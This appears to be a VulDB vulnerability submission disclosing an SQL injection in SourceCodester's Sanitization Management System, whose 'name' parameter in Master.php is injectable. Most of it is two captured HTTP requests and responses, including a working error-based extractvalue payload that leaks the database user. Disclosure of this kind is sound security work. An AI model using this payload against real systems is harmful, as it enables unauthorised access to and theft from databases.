| Title | sourcecodester Sanitization-Management-System SQL injection |
|---|
| Description | A vulnerability classified as critical has been discovered in SMS. This affects an unknown part of the file Master.php. Manipulation on parameter ID results in sql injection
#1, visit cms
#2,Use burp to grab request packets
#3,I found that there is sql injection in name=”id“ in the form submitted by path /php-sms/classes/Master.php?f=save quote
request and return packets
-----------------------------------------------------------------------------------------------------------
POST /php-sms/classes/Master.php?f=save_service HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="100"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycKqminYBwcgy9RHs
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept-Language: en-US
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-sms/admin/?page=services/manage_service
Connection: keep-alive
Cookie: PHPSESSID=u16ltkbk2uotkvrd3duoo0h1rj
Content-Length: 718
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="id"
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="name"
1'
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="description"
555
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="files"; filename="image.jpg"
Content-Type: image/jpeg
1
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="status"
0
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="img"; filename="zip.zip"
Content-Type: application/x-zip-compressed
1
------WebKitFormBoundarycKqminYBwcgy9RHs--
-----------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Wed, 02 Nov 2022 09:11:32 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/7.4.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 349
<br />
<b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>E:\phpstudy_pro\WWW\php-sms\classes\Master.php</b> on line <b>48</b><br />
{"status":"failed","error":"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and delete_flag = 0' at line 1"}
-------------------------------------------------------------------------------------
POST /php-sms/classes/Master.php?f=save_service HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="100"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycKqminYBwcgy9RHs
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept-Language: en-US
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-sms/admin/?page=services/manage_service
Connection: keep-alive
Cookie: PHPSESSID=u16ltkbk2uotkvrd3duoo0h1rj
Content-Length: 778
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="id"
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="name"
1' and (extractvalue(1,concat(0x7e,(select user()),0x7e))); --
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="description"
555
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="files"; filename="image.jpg"
Content-Type: image/jpeg
1
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="status"
0
------WebKitFormBoundarycKqminYBwcgy9RHs
Content-Disposition: form-data; name="img"; filename="zip.zip"
Content-Type: application/x-zip-compressed
1
------WebKitFormBoundarycKqminYBwcgy9RHs--
------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Wed, 02 Nov 2022 09:15:07 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/7.4.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 220
<br />
<b>Notice</b>: Trying to get property 'num_rows' of non-object in <b>E:\phpstudy_pro\WWW\php-sms\classes\Master.php</b> on line <b>48</b><br />
{"status":"failed","error":"XPATH syntax error: '~root@localhost~'"} |
|---|
| Source | ⚠️ https://github.com/x9AD8/Sanitization-Management-System/blob/main/README.md |
|---|
| User | uchihashow (ID 34954) |
|---|
| Submission | 2022-11-02 10:30 (2 years ago) |
|---|
| Moderation | 2022-11-05 09:46 (3 days later) |
|---|
| Status | Przyjęty |
|---|
| VulDB Entry | 213012 |
|---|